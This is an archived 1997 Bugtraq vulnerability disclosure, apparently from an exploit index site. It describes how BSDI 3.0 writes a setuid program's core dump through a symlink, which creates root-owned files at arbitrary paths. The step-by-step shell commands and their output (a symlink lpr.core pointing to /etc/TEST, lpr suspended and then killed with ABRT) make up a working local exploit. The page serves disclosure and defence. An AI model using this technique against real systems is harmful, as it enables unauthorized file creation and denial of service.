BSDI 3.x corefile problem

Summary
Description:BSDI 3.0 apparently allows any program to overwrite/create files through a core dump link.
Author:Nir Soffer <scorpios@CS.HUJI.AC.IL>
Compromise:Definately DOS, possibly become r00t
Vulnerable Systems:BSDI 3.0
Date:19 June 1997
Notes:Several people mentioned that he was wrong about overwriting files. If the mode is 0600, you CAN overwrite them. This includes a lot of files you might want to overwrite ;).
Details


Date: Thu, 19 Jun 1997 20:42:33 +0300
From: Nir Soffer <scorpios@CS.HUJI.AC.IL>
To: BUGTRAQ@NETSPACE.ORG
Subject: Core file anomalies under BSDi 3.0

Well for starters, system information :

BSD/OS beep.cs.huji.ac.il 3.0 BSDI BSD/OS 3.0 Kernel #2: Mon Mar 31
13:39:46 IDT 1997     danny@sexta.cs.huji.ac.il:/usr/src/sys/compile/SEXTA
i386

A small and neat bug in BSDi 3.x allows people to arbitrarly write files
with crap for data, but not overwrite them. Like so:

Have a symbolic link, called [programname].core to desired file. Program
must be setuid root.

beep[ /tmp ] ls -la lpr.core
lrwxrwxrwt  1 root  wheel  9 Jun 19 20:30 lpr.core@ -> /etc/TEST
beep[ /tmp ]

Just to make sure that file doesn't exist :

beep[ /tmp ] ls -la /etc/TEST
ls: /etc/TEST: No such file or directory
beep[ /tmp ]

Run program. (In our case lpr is convenient since it waits for tty input
and suspends itself.)

beep[ /tmp ] lpr &
[1] 27886
beep[ /tmp ]
[1]  + Suspended (tty input)         lpr
beep[ /tmp ]


Kill it with the ABRT signal.

beep[ /tmp ] kill -ABRT %1
beep[ /tmp ] fg
lpr
Abort (core dumped)
beep[ /tmp ]

And voila :

beep[ /tmp ] ls -la /etc/TEST
-rw-------  1 root  wheel  184320 Jun 19 20:39 /etc/TEST
beep[ /tmp ]

This exploit is similar to the Solaris 2.4 core exploit - with a few
notable diffrences :

A.) BSDi doesn't give a damn that the euid!=ruid, so finding a setgid
program with priviliges isn't neccesary.

B.) BSDi _does_ however, check if the file exists, so it's quite
impossible to overwrite files.

C.) BSDi _does_ change the permissions of the core dump to 600, and it
keeps on being owned by root, so changing the file is impossible as well.

Regards,
Nir.

--
Nir Soffer AKA ScorpioS, scorpios@cs.huji.ac.il .
USER, n.:
        The word computer professionals use when they mean "idiot."
                -- Dave Barry, "Claw Your Way to the Top"

More Exploits!

The master index of all exploits is available here (Very large file)
Or you can pick your favorite operating system:
All OS's Linux Solaris/SunOS Micro$oft
*BSD Macintosh AIX IRIX
ULTRIX/Digital UNIX HP/UX SCO Remote exploits

This page is part of Fyodor's exploit world. For a free program to automate scanning your network for vulnerable hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resources: